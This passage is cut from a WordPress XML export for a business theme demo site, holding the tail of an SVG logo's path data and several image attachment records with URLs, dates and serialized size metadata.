	c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4
	c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4
	c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1
	c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2
	c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2
	c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6
	c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7
	c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1
	c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5
	C40.4,20.6,40.4,20.5,40.4,20.3z"/>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5
		c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3
		c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1
		c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3
		c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"/>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3
		c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2
		c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3
		c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"/>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19
		C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9
		c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z
		 M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7
		C88.8,5.7,89.1,5.5,89.5,5.5z"/>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1
		c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2
		c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7
		c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1
		c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5
		c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"/>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7
		c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"/>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7
		c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4
		c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8
		s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"/>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7
		c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4
		c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8
		s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"/>
</g>
</svg>
]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>testi1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/about-us/testi1/</link>
		<pubDate>Tue, 29 Dec 2020 06:58:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/testi1.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1940</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 06:58:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 06:58:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[testi1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/testi1.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/testi1.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:90;s:6:"height";i:90;s:4:"file";s:18:"2020/12/testi1.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-icon</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/services-with-icon/bg1-service-icon/</link>
		<pubDate>Tue, 29 Dec 2020 07:07:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-icon.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1950</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:07:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:07:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-icon]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>885</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-icon.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/bg1-service-icon.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:767;s:4:"file";s:28:"2020/12/bg1-service-icon.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:28:"bg1-service-icon-300x120.jpg";s:5:"width";i:300;s:6:"height";i:120;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"bg1-service-icon-1024x409.jpg";s:5:"width";i:1024;s:6:"height";i:409;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"bg1-service-icon-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"bg1-service-icon-768x307.jpg";s:5:"width";i:768;s:6:"height";i:307;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:29:"bg1-service-icon-1536x614.jpg";s:5:"width";i:1536;s:6:"height";i:614;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"bg1-service-icon-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"bg1-service-icon-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:29:"bg1-service-icon-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:29:"bg1-service-icon-1200x767.jpg";s:5:"width";i:1200;s:6:"height";i:767;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/flip-box1/</link>
		<pubDate>Tue, 29 Dec 2020 07:11:35 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1955</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:11:35]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:11:35]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/flip-box1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:21:"2020/12/flip-box1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"flip-box1-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"flip-box1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"flip-box1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/flip-box2/</link>
		<pubDate>Tue, 29 Dec 2020 07:12:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1956</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:12:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:12:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/flip-box2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:21:"2020/12/flip-box2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"flip-box2-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"flip-box2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"flip-box2-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/flip-box3/</link>
		<pubDate>Tue, 29 Dec 2020 07:12:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1957</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:12:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:12:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/flip-box3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:21:"2020/12/flip-box3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"flip-box3-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"flip-box3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"flip-box3-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>our-vision</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-vision/</link>
		<pubDate>Tue, 29 Dec 2020 07:15:07 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/our-vision.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1964</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:15:07]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:15:07]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-vision]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/our-vision.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/our-vision.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:656;s:4:"file";s:22:"2020/12/our-vision.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:22:"our-vision-300x262.jpg";s:5:"width";i:300;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"our-vision-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"our-vision-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"our-vision-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"our-vision-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/image1-value/</link>
		<pubDate>Tue, 29 Dec 2020 07:16:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1966</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:16:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:16:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/image1-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:656;s:4:"file";s:24:"2020/12/image1-value.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"image1-value-300x262.jpg";s:5:"width";i:300;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image1-value-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-value-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"image1-value-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";